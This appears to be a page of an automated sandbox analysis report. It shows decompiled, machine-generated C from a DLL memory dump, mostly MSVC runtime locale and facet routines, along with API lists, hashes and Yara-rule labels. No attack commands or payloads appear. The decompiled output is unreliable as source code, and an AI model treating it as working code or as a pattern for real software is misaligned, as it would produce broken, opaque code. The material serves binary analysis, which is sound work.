																																											__eflags = _t812;
																																											if(_t812 != 0) {
																																												L96:
																																												E6E1C66BA(_t858 - 0x14);
																																												return E6E1E0075(_t812);
																																											} else {
																																												__eflags = _t832;
																																												if(_t832 == 0) {
																																													_push( *((intOrPtr*)(_t858 + 8)));
																																													_push(_t858 - 0x10);
																																													__eflags = E6E1D1409(_t606, _t700, _t797, _t812, _t832) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6E1A1438(_t858 - 0x20);
																																														E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																														asm("int3");
																																														E6E1E00AC(0x6e2283cf, _t606, _t812, _t832, 0x14);
																																														E6E1C6653(_t858 - 0x14, 0);
																																														_t833 =  *0x6e286de0; // 0x0
																																														 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																														 *(_t858 - 0x10) = _t833;
																																														_t461 = E6E1A161C(0x6e286d8c);
																																														_t707 =  *((intOrPtr*)(_t858 + 8));
																																														_t813 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t461);
																																														__eflags = _t813;
																																														if(_t813 != 0) {
																																															L103:
																																															E6E1C66BA(_t858 - 0x14);
																																															return E6E1E0075(_t813);
																																														} else {
																																															__eflags = _t833;
																																															if(_t833 == 0) {
																																																_push( *((intOrPtr*)(_t858 + 8)));
																																																_push(_t858 - 0x10);
																																																__eflags = E6E1D1471(_t606, _t707, _t797, _t813, _t833) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6E1A1438(_t858 - 0x20);
																																																	E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																	asm("int3");
																																																	E6E1E00AC(0x6e2283cf, _t606, _t813, _t833, 0x14);
																																																	E6E1C6653(_t858 - 0x14, 0);
																																																	_t834 =  *0x6e286dfc; // 0x0
																																																	 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																	 *(_t858 - 0x10) = _t834;
																																																	_t474 = E6E1A161C(0x6e286da8);
																																																	_t714 =  *((intOrPtr*)(_t858 + 8));
																																																	_t814 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t474);
																																																	__eflags = _t814;
																																																	if(_t814 != 0) {
																																																		L110:
																																																		E6E1C66BA(_t858 - 0x14);
																																																		return E6E1E0075(_t814);
																																																	} else {
																																																		__eflags = _t834;
																																																		if(_t834 == 0) {
																																																			_push( *((intOrPtr*)(_t858 + 8)));
																																																			_push(_t858 - 0x10);
																																																			__eflags = E6E1D14EC(_t606, _t714, _t797, _t814, _t834) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6E1A1438(_t858 - 0x20);
																																																				E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																				asm("int3");
																																																				E6E1E00AC(0x6e2283cf, _t606, _t814, _t834, 0x14);
																																																				E6E1C6653(_t858 - 0x14, 0);
																																																				_t835 =  *0x6e286dcc; // 0x0
																																																				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																				 *(_t858 - 0x10) = _t835;
																																																				_t487 = E6E1A161C(0x6e286d80);
																																																				_t721 =  *((intOrPtr*)(_t858 + 8));
																																																				_t815 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t487);
																																																				__eflags = _t815;
																																																				if(_t815 != 0) {
																																																					L117:
																																																					E6E1C66BA(_t858 - 0x14);
																																																					return E6E1E0075(_t815);
																																																				} else {
																																																					__eflags = _t835;
																																																					if(_t835 == 0) {
																																																						_push( *((intOrPtr*)(_t858 + 8)));
																																																						_push(_t858 - 0x10);
																																																						__eflags = E6E1D1558(_t606, _t721, _t797, _t815, _t835) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6E1A1438(_t858 - 0x20);
																																																							E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																							asm("int3");
																																																							E6E1E00AC(0x6e2283cf, _t606, _t815, _t835, 0x14);
																																																							E6E1C6653(_t858 - 0x14, 0);
																																																							_t836 =  *0x6e286e00; // 0x0
																																																							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																							 *(_t858 - 0x10) = _t836;
																																																							_t500 = E6E1A161C(0x6e286dac);
																																																							_t728 =  *((intOrPtr*)(_t858 + 8));
																																																							_t816 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t500);
																																																							__eflags = _t816;
																																																							if(_t816 != 0) {
																																																								L124:
																																																								E6E1C66BA(_t858 - 0x14);
																																																								return E6E1E0075(_t816);
																																																							} else {
																																																								__eflags = _t836;
																																																								if(_t836 == 0) {
																																																									_push( *((intOrPtr*)(_t858 + 8)));
																																																									_push(_t858 - 0x10);
																																																									__eflags = E6E1D15C4(_t606, _t728, _t797, _t816, _t836) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										E6E1A1438(_t858 - 0x20);
																																																										E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																										asm("int3");
																																																										E6E1E00AC(0x6e2283cf, _t606, _t816, _t836, 0x14);
																																																										E6E1C6653(_t858 - 0x14, 0);
																																																										_t837 =  *0x6e286dd0; // 0x0
																																																										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																																										 *(_t858 - 0x10) = _t837;
																																																										_t513 = E6E1A161C(0x6e286d60);
																																																										_t735 =  *((intOrPtr*)(_t858 + 8));
																																																										_t817 = E6E1A171B( *((intOrPtr*)(_t858 + 8)), _t513);
																																																										__eflags = _t817;
																																																										if(_t817 != 0) {
																																																											L131:
																																																											E6E1C66BA(_t858 - 0x14);
																																																											return E6E1E0075(_t817);
																																																										} else {
																																																											__eflags = _t837;
																																																											if(_t837 == 0) {
																																																												_push( *((intOrPtr*)(_t858 + 8)));
																																																												_push(_t858 - 0x10);
																																																												__eflags = E6E1D162A(_t606, _t735, _t797, _t817, _t837) - 0xffffffff;
																																																												if(__eflags == 0) {
																																																													_t739 = _t858 - 0x20;
																																																													E6E1A1438(_t739);
																																																													E6E1E3D74(_t858 - 0x20, 0x6e283504);
																																																													asm("int3");
																																																													E6E1E00AC(0x6e22851f, _t606, _t817, _t837, 4);
																																																													_t838 = _t739;
																																																													 *(_t858 - 0x10) = _t838;
																																																													 *((intOrPtr*)(_t838 + 4)) =  *((intOrPtr*)(_t858 + 0xc));
																																																													_push( *((intOrPtr*)(_t858 + 0x14)));
																																																													_t273 = _t858 - 4;
																																																													 *_t273 =  *(_t858 - 4) & 0x00000000;
																																																													__eflags =  *_t273;
																																																													 *_t838 = 0x6e22c0c4;
																																																													 *((char*)(_t838 + 0x28)) =  *((intOrPtr*)(_t858 + 0x10));
																																																													E6E1D542F(_t606, _t739, _t797, _t817, _t838,  *_t273);
																																																													return E6E1E0075(_t838,  *((intOrPtr*)(_t858 + 8)));
																																																												} else {
																																																													_t817 =  *(_t858 - 0x10);
																																																													 *(_t858 - 0x10) = _t817;
																																																													 *(_t858 - 4) = 1;
																																																													E6E1C6FD3(__eflags, _t817);
																																																													 *0x6e22a26c();
																																																													 *((intOrPtr*)( *((intOrPtr*)( *_t817 + 4))))();
																																																													 *0x6e286dd0 = _t817;
																																																													goto L131;
																																																												}
																																																											} else {
																																																												_t817 = _t837;
																																																												goto L131;
																																																											}
																																																										}
																																																									} else {
																																																										_t816 =  *(_t858 - 0x10);
																																																										 *(_t858 - 0x10) = _t816;
																																																										 *(_t858 - 4) = 1;
																																																										E6E1C6FD3(__eflags, _t816);
																																																										 *0x6e22a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t816 + 4))))();
																																																										 *0x6e286e00 = _t816;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t816 = _t836;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t815 =  *(_t858 - 0x10);
																																																							 *(_t858 - 0x10) = _t815;
																																																							 *(_t858 - 4) = 1;
																																																							E6E1C6FD3(__eflags, _t815);
																																																							 *0x6e22a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t815 + 4))))();
																																																							 *0x6e286dcc = _t815;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t815 = _t835;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t814 =  *(_t858 - 0x10);
																																																				 *(_t858 - 0x10) = _t814;
																																																				 *(_t858 - 4) = 1;
																																																				E6E1C6FD3(__eflags, _t814);
																																																				 *0x6e22a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t814 + 4))))();
																																																				 *0x6e286dfc = _t814;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t814 = _t834;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t813 =  *(_t858 - 0x10);
																																																	 *(_t858 - 0x10) = _t813;
																																																	 *(_t858 - 4) = 1;
																																																	E6E1C6FD3(__eflags, _t813);
																																																	 *0x6e22a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t813 + 4))))();
																																																	 *0x6e286de0 = _t813;
																																																	goto L103;
																																																}
																																															} else {
																																																_t813 = _t833;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t812 =  *(_t858 - 0x10);
																																														 *(_t858 - 0x10) = _t812;
																																														 *(_t858 - 4) = 1;
																																														E6E1C6FD3(__eflags, _t812);
																																														 *0x6e22a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t812 + 4))))();
																																														 *0x6e286ddc = _t812;
																																														goto L96;
																																													}
																																												} else {
																																													_t812 = _t832;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t811 =  *(_t858 - 0x10);
																																											 *(_t858 - 0x10) = _t811;
																																											 *(_t858 - 4) = 1;
																																											E6E1C6FD3(__eflags, _t811);
																																											 *0x6e22a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t811 + 4))))();
																																											 *0x6e286db0 = _t811;
																																											goto L89;
																																										}
																																									} else {
																																										_t811 = _t831;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t810 =  *(_t858 - 0x10);
																																								 *(_t858 - 0x10) = _t810;
																																								 *(_t858 - 4) = 1;
																																								E6E1C6FD3(__eflags, _t810);
																																								 *0x6e22a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t810 + 4))))();
																																								 *0x6e286dd8 = _t810;
																																								goto L82;
																																							}
																																						} else {
																																							_t810 = _t830;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t809 =  *(_t858 - 0x10);
																																					 *(_t858 - 0x10) = _t809;
																																					 *(_t858 - 4) = 1;
																																					E6E1C6FD3(__eflags, _t809);
																																					 *0x6e22a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t809 + 4))))();
																																					 *0x6e286dc4 = _t809;
																																					goto L75;
																																				}
																																			} else {
																																				_t809 = _t829;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t808 =  *(_t858 - 0x10);
																																		 *(_t858 - 0x10) = _t808;
																																		 *(_t858 - 4) = 1;
																																		E6E1C6FD3(__eflags, _t808);
																																		 *0x6e22a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t808 + 4))))();
																																		 *0x6e286dc8 = _t808;
																																		goto L68;
																																	}
																																} else {
																																	_t808 = _t828;
																																	goto L68;
																																}
																															}
																														} else {
																															_t807 =  *(_t858 - 0x10);
																															 *(_t858 - 0x10) = _t807;
																															 *(_t858 - 4) = 1;
																															E6E1C6FD3(__eflags, _t807);
																															 *0x6e22a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t807 + 4))))();
																															 *0x6e286df4 = _t807;
																															goto L61;
																														}
																													} else {
																														_t807 = _t827;
																														goto L61;
																													}
																												}
																											} else {
																												_t806 =  *(_t858 - 0x10);
																												 *(_t858 - 0x10) = _t806;
																												 *(_t858 - 4) = 1;
																												E6E1C6FD3(__eflags, _t806);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t806 + 4))))();
																												 *0x6e286df8 = _t806;
																												goto L54;
																											}
																										} else {
																											_t806 = _t826;
																											goto L54;
																										}
																									}
																								} else {
																									_t805 =  *(_t858 - 0x10);
																									 *(_t858 - 0x10) = _t805;
																									 *(_t858 - 4) = 1;
																									E6E1C6FD3(__eflags, _t805);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t805 + 4))))();
																									 *0x6e286dc0 = _t805;
																									goto L47;
																								}
																							} else {
																								_t805 = _t825;
																								goto L47;
																							}
																						}
																					} else {
																						_t804 =  *(_t858 - 0x10);
																						 *(_t858 - 0x10) = _t804;
																						 *(_t858 - 4) = 1;
																						E6E1C6FD3(__eflags, _t804);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t804 + 4))))();
																						 *0x6e286df0 = _t804;
																						goto L40;
																					}
																				} else {
																					_t804 = _t824;
																					goto L40;
																				}
																			}
																		} else {
																			_t803 =  *(_t858 - 0x10);
																			 *(_t858 - 0x10) = _t803;
																			 *(_t858 - 4) = 1;
																			E6E1C6FD3(__eflags, _t803);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t803 + 4))))();
																			 *0x6e286dbc = _t803;
																			goto L33;
																		}
																	} else {
																		_t803 = _t823;
																		goto L33;
																	}
																}
															} else {
																_t802 =  *(_t858 - 0x10);
																 *(_t858 - 0x10) = _t802;
																 *(_t858 - 4) = 1;
																E6E1C6FD3(__eflags, _t802);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t802 + 4))))();
																 *0x6e286dec = _t802;
																goto L26;
															}
														} else {
															_t802 = _t822;
															goto L26;
														}
													}
												} else {
													_t801 =  *(_t858 - 0x10);
													 *(_t858 - 0x10) = _t801;
													 *(_t858 - 4) = 1;
													E6E1C6FD3(__eflags, _t801);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t801 + 4))))();
													 *0x6e286db8 = _t801;
													goto L19;
												}
											} else {
												_t801 = _t821;
												goto L19;
											}
										}
									} else {
										_t800 =  *(_t858 - 0x10);
										 *(_t858 - 0x10) = _t800;
										 *(_t858 - 4) = 1;
										E6E1C6FD3(__eflags, _t800);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t800 + 4))))();
										 *0x6e286de8 = _t800;
										goto L12;
									}
								} else {
									_t800 = _t820;
									goto L12;
								}
							}
						} else {
							_t799 =  *(_t858 - 0x10);
							 *(_t858 - 0x10) = _t799;
							 *(_t858 - 4) = 1;
							E6E1C6FD3(__eflags, _t799);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t799 + 4))))();
							 *0x6e286dd4 = _t799;
							goto L5;
						}
					} else {
						_t799 = _t819;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CF0E4
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF0EE
int.LIBCPMT ref: 6E1CF105

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

ctype.LIBCPMT ref: 6E1CF128
std::_Facet_Register.LIBCPMT ref: 6E1CF13F
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF15F
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF17D

Strings

(k(n, xrefs: 6E1CF0F9

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: (k(n
API String ID: 1394824916-4145520377
Opcode ID: ede4d65d80b5cf43701d66f93d606e54925046580e77aea59690f975ef6a2e93
Instruction ID: 1e8ca8cb7d423c84789e45c6f57448fc64c167cd44a29ab081d33df0703bb644
Opcode Fuzzy Hash: ede4d65d80b5cf43701d66f93d606e54925046580e77aea59690f975ef6a2e93
Instruction Fuzzy Hash: 75113A759105288BCF01EBE4C854AFEB7BAAF65B14F240409D524E7290DF78D984E791

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CA0FF, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6E1CA0FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				void* _v16;
				char _v20;
				intOrPtr* _v24;
				char _v32;
				void* _t63;
				intOrPtr* _t64;
				void* _t76;
				void* _t89;
				void* _t102;
				intOrPtr* _t158;
				intOrPtr* _t174;
				intOrPtr* _t175;
				intOrPtr* _t176;
				void* _t178;
				intOrPtr* _t179;
				intOrPtr* _t180;
				void* _t181;

				_t171 = __edx;
				_t130 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653( &_v20, 0);
				_t178 =  *0x6e286cc8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t178;
				_t63 = E6E1A161C(0x6e286b38);
				_t133 = _a8;
				_t64 = E6E1A171B(_a8, _t63);
				_t173 = _t64;
				if(_t64 != 0) {
					L5:
					E6E1C66BA( &_v20);
					return E6E1E0075(_t173);
				} else {
					if(_t178 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6E1CA9D2(__ebx, _t133, __edx, _t173, _t178) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438( &_v32);
							E6E1E3D74( &_v32, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t173, _t178, 0x14);
							E6E1C6653( &_v20, 0);
							_t179 =  *0x6e286ccc; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t179;
							_t76 = E6E1A161C(0x6e286cb8);
							_t140 = _a8;
							_t174 = E6E1A171B(_a8, _t76);
							__eflags = _t174;
							if(_t174 != 0) {
								L12:
								E6E1C66BA( &_v20);
								return E6E1E0075(_t174);
							} else {
								__eflags = _t179;
								if(_t179 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6E1CAA38(_t130, _t140, __edx, _t174, _t179) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438( &_v32);
										E6E1E3D74( &_v32, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t130, _t174, _t179, 0x14);
										E6E1C6653( &_v20, 0);
										_t180 =  *0x6e286cd0; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t180;
										_t89 = E6E1A161C(0x6e286cbc);
										_t147 = _a8;
										_t175 = E6E1A171B(_a8, _t89);
										__eflags = _t175;
										if(_t175 != 0) {
											L19:
											E6E1C66BA( &_v20);
											return E6E1E0075(_t175);
										} else {
											__eflags = _t180;
											if(_t180 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6E1CAAA0(_t130, _t147, __edx, _t175, _t180) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438( &_v32);
													E6E1E3D74( &_v32, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t130, _t175, _t180, 0x14);
													E6E1C6653( &_v20, 0);
													_t181 =  *0x6e286cd4; // 0x0
													_v4 = _v4 & 0x00000000;
													_v16 = _t181;
													_t102 = E6E1A161C(0x6e286cc0);
													_t154 = _a8;
													_t176 = E6E1A171B(_a8, _t102);
													__eflags = _t176;
													if(_t176 != 0) {
														L26:
														E6E1C66BA( &_v20);
														return E6E1E0075(_t176);
													} else {
														__eflags = _t181;
														if(_t181 == 0) {
															_push(_a8);
															_push( &_v16);
															__eflags = E6E1CAB08(_t130, _t154, _t171, _t176, _t181) - 0xffffffff;
															if(__eflags == 0) {
																_t158 =  &_v32;
																E6E1A1438(_t158);
																E6E1E3D74( &_v32, 0x6e283504);
																asm("int3");
																_push(_t158);
																 *((intOrPtr*)(_t158 + 4)) = _v8;
																_v24 = _t158;
																 *_t158 = 0x6e22ba24;
																return _t158;
															} else {
																_t176 = _v16;
																_v16 = _t176;
																_v4 = 1;
																E6E1C6FD3(__eflags, _t176);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t176 + 4))))();
																 *0x6e286cd4 = _t176;
																goto L26;
															}
														} else {
															_t176 = _t181;
															goto L26;
														}
													}
												} else {
													_t175 = _v16;
													_v16 = _t175;
													_v4 = 1;
													E6E1C6FD3(__eflags, _t175);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t175 + 4))))();
													 *0x6e286cd0 = _t175;
													goto L19;
												}
											} else {
												_t175 = _t180;
												goto L19;
											}
										}
									} else {
										_t174 = _v16;
										_v16 = _t174;
										_v4 = 1;
										E6E1C6FD3(__eflags, _t174);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t174 + 4))))();
										 *0x6e286ccc = _t174;
										goto L12;
									}
								} else {
									_t174 = _t179;
									goto L12;
								}
							}
						} else {
							_t173 = _v16;
							_v16 = _t173;
							_v4 = 1;
							E6E1C6FD3(__eflags, _t173);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t173 + 4))))();
							 *0x6e286cc8 = _t173;
							goto L5;
						}
					} else {
						_t173 = _t178;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6E1CA106
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CA110
int.LIBCPMT ref: 6E1CA127

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

ctype.LIBCPMT ref: 6E1CA14A
std::_Facet_Register.LIBCPMT ref: 6E1CA161
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CA181
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CA19F

Strings

8k(n, xrefs: 6E1CA11B

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowctype
String ID: 8k(n
API String ID: 1394824916-2802764134
Opcode ID: dc04cd98c20ff474064467ce398ead27a784c947ab179023beac6491670c6897
Instruction ID: 203d0ce524e9c409bb6d7ad40ed71b448bb87f6885a7f0cc4cbc50e4b1fc8aff
Opcode Fuzzy Hash: dc04cd98c20ff474064467ce398ead27a784c947ab179023beac6491670c6897
Instruction Fuzzy Hash: D81136759105188BCF02DBE8C844AFEB77AAF64B14F140808E011EB2D0DF78DD88E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20E984, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6E20E984(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8, intOrPtr _a12) {
				signed int _v8;
				short _v270;
				short _v272;
				char _v528;
				char _v700;
				signed int _v704;
				signed int _v708;
				short _v710;
				signed int* _v712;
				signed int _v716;
				signed int _v720;
				signed int _v724;
				signed int* _v728;
				signed int _v732;
				signed int _v736;
				signed int _v740;
				signed int _v744;
				signed int _t151;
				void* _t158;
				signed int _t159;
				signed int _t160;
				intOrPtr _t161;
				signed int _t164;
				signed int _t168;
				signed int _t169;
				intOrPtr* _t171;
				intOrPtr _t172;
				signed int _t175;
				signed int _t176;
				signed int _t178;
				signed int _t198;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t210;
				signed int _t216;
				intOrPtr* _t217;
				signed int _t230;
				signed int _t233;
				intOrPtr* _t234;
				signed int _t236;
				signed int* _t240;
				intOrPtr _t249;
				signed int _t254;
				signed int _t256;
				void* _t257;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				short _t263;
				signed int _t265;
				signed int _t267;
				void* _t269;
				void* _t271;

				_t265 = _t267;
				_t151 =  *0x6e28506c; // 0x9881d723
				_v8 = _t151 ^ _t265;
				_push(__ebx);
				_t210 = _a8;
				_push(__esi);
				_push(__edi);
				_t249 = _a4;
				_v744 = _t210;
				_v728 = E6E20D5FF(_t210, __ecx, __edx) + 0x278;
				_t158 = E6E20DE92(_t210, __edx, _t249, _a12, _a12,  &_v272, 0x83,  &_v700, 0x55,  &_v708);
				_t269 = _t267 - 0x2e4 + 0x18;
				if(_t158 != 0) {
					_t11 = _t210 + 2; // 0x6
					_t254 = _t11 << 4;
					__eflags = _t254;
					_t159 =  &_v272;
					_v716 = _t254;
					_t247 =  *(_t254 + _t249);
					_t216 =  *(_t254 + _t249);
					while(1) {
						_v704 = _v704 & 0x00000000;
						__eflags =  *_t159 -  *_t216;
						_t256 = _v716;
						if( *_t159 !=  *_t216) {
							break;
						}
						__eflags =  *_t159;
						if( *_t159 == 0) {
							L9:
							_t160 = _v704;
						} else {
							_t263 =  *((intOrPtr*)(_t159 + 2));
							__eflags = _t263 -  *((intOrPtr*)(_t216 + 2));
							_v710 = _t263;
							_t256 = _v716;
							if(_t263 !=  *((intOrPtr*)(_t216 + 2))) {
								break;
							} else {
								_t159 = _t159 + 4;
								_t216 = _t216 + 4;
								__eflags = _v710;
								if(_v710 != 0) {
									continue;
								} else {
									goto L9;
								}
							}
						}
						L11:
						__eflags = _t160;
						if(_t160 != 0) {
							_t217 =  &_v272;
							_t247 = _t217 + 2;
							do {
								_t161 =  *_t217;
								_t217 = _t217 + 2;
								__eflags = _t161 - _v704;
							} while (_t161 != _v704);
							_v720 = (_t217 - _t247 >> 1) + 1;
							_t164 = E6E20F26D(_t217 - _t247 >> 1, 4 + ((_t217 - _t247 >> 1) + 1) * 2);
							_v732 = _t164;
							__eflags = _t164;
							if(_t164 == 0) {
								goto L2;
							} else {
								_v724 =  *((intOrPtr*)(_t256 + _t249));
								_t35 = _t210 * 4; // 0xe764e850
								_v736 =  *((intOrPtr*)(_t249 + _t35 + 0xa0));
								_t38 = _t249 + 8; // 0x8b018b
								_v740 =  *_t38;
								_t226 =  &_v272;
								_v712 = _t164 + 4;
								_t168 = E6E2091A7(_t164 + 4, _v720,  &_v272);
								_t271 = _t269 + 0xc;
								__eflags = _t168;
								if(_t168 != 0) {
									_t169 = _v704;
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									_push(_t169);
									E6E202188();
									asm("int3");
									_t171 =  *0x6e2876f0; // 0x35b47d8
									 *0x6e285108 =  *((intOrPtr*)(_t171 + 0x88));
									 *0x6e2851c0 =  *_t171;
									_t172 =  *((intOrPtr*)(_t171 + 4));
									 *0x6e2851ec = _t172;
									return _t172;
								} else {
									__eflags = _v272 - 0x43;
									 *((intOrPtr*)(_t256 + _t249)) = _v712;
									if(_v272 != 0x43) {
										L20:
										_t175 = E6E20DB3B(_t210, _t226, _t249,  &_v700);
										_t230 = _v704;
										 *(_t249 + 0xa0 + _t210 * 4) = _t175;
									} else {
										__eflags = _v270;
										if(_v270 != 0) {
											goto L20;
										} else {
											_t230 = _v704;
											 *(_t249 + 0xa0 + _t210 * 4) = _t230;
										}
									}
									__eflags = _t210 - 2;
									if(_t210 != 2) {
										__eflags = _t210 - 1;
										if(_t210 != 1) {
											__eflags = _t210 - 5;
											if(_t210 == 5) {
												 *((intOrPtr*)(_t249 + 0x14)) = _v708;
											}
										} else {
											 *((intOrPtr*)(_t249 + 0x10)) = _v708;
										}
									} else {
										_t261 = _v728;
										_t247 = _t230;
										_t240 = _t261;
										 *(_t249 + 8) = _v708;
										_v712 = _t261;
										_v720 = _t261[8];
										_v708 = _t261[9];
										while(1) {
											_t64 = _t249 + 8; // 0x8b018b
											__eflags =  *_t64 -  *_t240;
											if( *_t64 ==  *_t240) {
												break;
											}
											_t262 = _v712;
											_t247 = _t247 + 1;
											_t207 =  *_t240;
											 *_t262 = _v720;
											_v708 = _t240[1];
											_t240 = _t262 + 8;
											 *((intOrPtr*)(_t262 + 4)) = _v708;
											_t210 = _v744;
											_t261 = _v728;
											_v720 = _t207;
											_v712 = _t240;
											__eflags = _t247 - 5;
											if(_t247 < 5) {
												continue;
											} else {
											}
											L28:
											__eflags = _t247 - 5;
											if(__eflags == 0) {
												_t88 = _t249 + 8; // 0x8b018b
												_t198 = E6E216102(_t210, _t247, _t249, __eflags, _v704, 1, 0x6e230ea8, 0x7f,  &_v528,  *_t88, 1);
												_t271 = _t271 + 0x1c;
												__eflags = _t198;
												_t199 = _v704;
												if(_t198 == 0) {
													_t261[1] = _t199;
												} else {
													do {
														 *(_t265 + _t199 * 2 - 0x20c) =  *(_t265 + _t199 * 2 - 0x20c) & 0x000001ff;
														_t199 = _t199 + 1;
														__eflags = _t199 - 0x7f;
													} while (_t199 < 0x7f);
													_t202 = E6E1E1C3C( &_v528,  *0x6e2851e8, 0xfe);
													_t271 = _t271 + 0xc;
													__eflags = _t202;
													_t261[1] = 0 | _t202 == 0x00000000;
												}
												_t103 = _t249 + 8; // 0x8b018b
												 *_t261 =  *_t103;
											}
